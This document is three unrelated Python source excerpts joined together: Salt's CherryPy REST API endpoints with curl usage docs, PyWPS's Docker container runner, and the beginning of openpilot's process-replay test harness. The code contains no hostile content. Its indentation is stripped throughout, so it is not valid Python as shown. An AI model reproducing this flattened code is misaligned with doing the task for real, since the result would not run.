creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
cherrypy.session['user'] = token['name']
if 'groups' in token:
cherrypy.session['groups'] = token['groups']
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied; instead,
authentication is handled by the SSH layer itself. The salt-ssh client
does not require a salt master to be running. Only a roster file must
be present in the salt configuration directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.info(saltEvent.tag)
console.debug(saltEvent.data)
};
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new WebSocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print(ws.recv())
ws.close()
The examples above show how to establish a websocket connection to Salt
and activate real-time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data; the handler reads
# the raw body and unserialized data directly
'tools.lowdata_fmt.on': False,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ build.revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
# Late import
try:
from cherrypy.lib import cpstats
except ImportError:
logger.error('Import of cherrypy.lib.cpstats failed. Possible '
'upstream bug here: https://github.com/cherrypy/cherrypy/issues/1444')
return {}
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in six.iteritems(self.url_map):
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
container.py
|
##################################################################
# Copyright 2018 Open Source Geospatial Foundation and others #
# licensed under MIT, Please consult LICENSE.txt for details #
##################################################################
import os
import pywps.configuration as config
from pywps.processing.basic import Processing
from owslib.wps import WebProcessingService as WPS
from pywps.response.status import WPS_STATUS
from pywps.exceptions import NoAvailablePort
import docker
import socket
import time
import threading
from pywps.inout.basic import LiteralInput, ComplexInput, BBoxInput
import owslib
from pywps.dblog import store_status
import logging
LOGGER = logging.getLogger("PYWPS")
class ClientError(Exception):
pass
class Container(Processing):
def __init__(self, process, wps_request, wps_response):
super().__init__(process, wps_request, wps_response)
self.port = _assign_port()
self.client = docker.from_env()
self.cntnr = self._create()
if self.job.wps_request.store_execute == 'true' and self.job.wps_request.status == 'true':
self.job.process.async_ = True
else:
self.job.process.async_ = False
def _create(self):
# Image to run and the directory mappings between host and container
cntnr_img = config.get_config_value("processing", "docker_img")
prcs_inp_dir = self.job.wps_response.process.workdir
prcs_out_dir = config.get_config_value("server", "outputpath")
dckr_inp_dir = config.get_config_value("processing", "dckr_inp_dir")
dckr_out_dir = config.get_config_value("processing", "dckr_out_dir")
# Expose the container's WPS port (5000) on the assigned host port and
# bind the host input/output directories read-write inside the container
container = self.client.containers.create(cntnr_img, ports={"5000/tcp": self.port}, detach=True,
volumes={prcs_out_dir: {'bind': dckr_out_dir, 'mode': 'rw'},
prcs_inp_dir: {'bind': dckr_inp_dir, 'mode': 'rw'}})
return container
def start(self):
self.cntnr.start()
# give the container a moment to bring its WPS service up before
# sending the Execute request
time.sleep(1)
self._execute()
if self.job.process.async_:
self._parse_status()
daemon = threading.Thread(target=check_status, args=(self,))
daemon.start()
else:
self._parse_outputs()
daemon = threading.Thread(target=self.dirty_clean)
daemon.start()
def stop(self):
self.cntnr.stop()
def cancel(self):
self.cntnr.kill()
def pause(self):
self.cntnr.pause()
def unpause(self):
self.cntnr.unpause()
def _execute(self):
url_execute = "http://localhost:{}/wps".format(self.port)
inputs = get_inputs(self.job.wps_request.inputs)
output = get_output(self.job.wps_request.outputs)
wps = WPS(url=url_execute, skip_caps=True)
self.execution = wps.execute(self.job.wps_request.identifier, inputs=inputs, output=output,
mode=self.job.process.async_)
def _parse_outputs(self):
for output in self.execution.processOutputs:
# TODO what if len(data) > 1 ??
if output.data:
self.job.wps_response.outputs[output.identifier].data = output.data[0]
if output.reference:
rp = output.reference[output.reference.index('outputs/'):]
self.job.wps_response.outputs[output.identifier].file = rp
self.job.wps_response.update_status_succeeded('PyWPS Process {} finished'.format(self.job.process.title))
store_status(self.job.wps_response.uuid, self.job.wps_response.status, self.job.wps_response.message)
def _parse_status(self):
container_status = self.execution.statusLocation.split("/outputs/")[-1]
status_url = self.job.process.status_url
local_status = status_url.split("/outputs/")[-1]
status_location = status_url.replace(local_status, container_status)
self.job.process.status_location = status_location
# self.job.process.status_location(self.job.process, status_location)
self.job.wps_response.update_status(message=self.execution.statusMessage)
def dirty_clean(self):
self.cntnr.stop()
self.cntnr.remove()
self.job.process.clean()
self.update_status()
def update_status(self):
self.job.wps_response.message = 'PyWPS Process {} finished'.format(self.job.process.title)
self.job.wps_response.percentage = 100
self.job.wps_response.status = WPS_STATUS.SUCCEEDED
store_status(self.job.wps_response.uuid, self.job.wps_response.status, self.job.wps_response.message,
self.job.wps_response.percentage)
def get_inputs(job_inputs):
"""
Return all inputs in [(input_name1, input_value1), (input_name2, input_value2)]
Return value can be used for WPS.execute method.
:return: input values
:rtype:list of tuples
"""
the_inputs = []
for key in job_inputs.keys():
inp = job_inputs[key][0]
if isinstance(inp, LiteralInput):
ows_inp = str(inp.data)
elif isinstance(inp, ComplexInput):
fp = os.path.basename(inp.file)
dckr_inp_dir = config.get_config_value('processing', 'dckr_inp_dir')
ows_inp = owslib.wps.ComplexDataInput("file://" + os.path.join(dckr_inp_dir, fp))
elif isinstance(inp, BBoxInput):
ows_inp = owslib.wps.BoundingBoxDataInput(inp.data)
else:
raise Exception("Unsupported input type: {}".format(type(inp).__name__))
the_inputs.append((key, ows_inp))
return the_inputs
def get_output(job_output):
"""
Return all outputs name
Return value can be used for WPS.execute method.
:return: output names
:rtype:list
"""
the_output = []
for key in job_output.keys():
the_output.append((key, job_output[key]['asReference']))
return the_output
def _assign_port():
port_min = int(config.get_config_value("processing", "port_min"))
port_max = int(config.get_config_value("processing", "port_max"))
for port in range(port_min, port_max):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
res = sock.connect_ex(('127.0.0.1', port))
sock.close()
# TODO find better solution for errno
if res != 0:
return port
raise NoAvailablePort("No port from range {}-{} available.".format(port_min, port_max))
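# A minimal alternative sketch (an assumption, not part of the original module):
# binding to port 0 asks the kernel for a free ephemeral port, which avoids
# probing a fixed range with connect_ex. The name _assign_port_by_bind is
# illustrative.
def _assign_port_by_bind():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('127.0.0.1', 0))  # port 0: the OS picks any free port
_, port = sock.getsockname()
sock.close()
return port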
def check_status(container):
sleep_secs = int(config.get_config_value('processing', 'sleep_secs'))
while True:
container.execution.checkStatus(sleepSecs=sleep_secs)
if container.execution.isComplete():
container.dirty_clean()
break
|
process_replay.py
|
#!/usr/bin/env python3
import capnp
import os
import sys
import threading
import importlib
if "CI" in os.environ:
def tqdm(x):
return x
else:
from tqdm import tqdm # type: ignore
from cereal import car, log
from selfdrive.car.car_helpers import get_car
import selfdrive.manager as manager
import cereal.messaging as messaging
from common.params import Params
from cereal.services import service_list
from collections import namedtuple
# Numpy gives different results based on CPU features after version 1.19
NUMPY_TOLERANCE = 1e-7
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance'])
def wait_for_event(evt):
if not evt.wait(15):
if threading.current_thread().name == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
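# Two-event rendezvous: receive() signals recv_called and then blocks on
# recv_ready; send() waits for recv_called, queues the data, and sets
# recv_ready so the paired receive() can pop it.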
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super(FakeSubMaster, self).__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super(FakeSubMaster, self).update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['pathPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
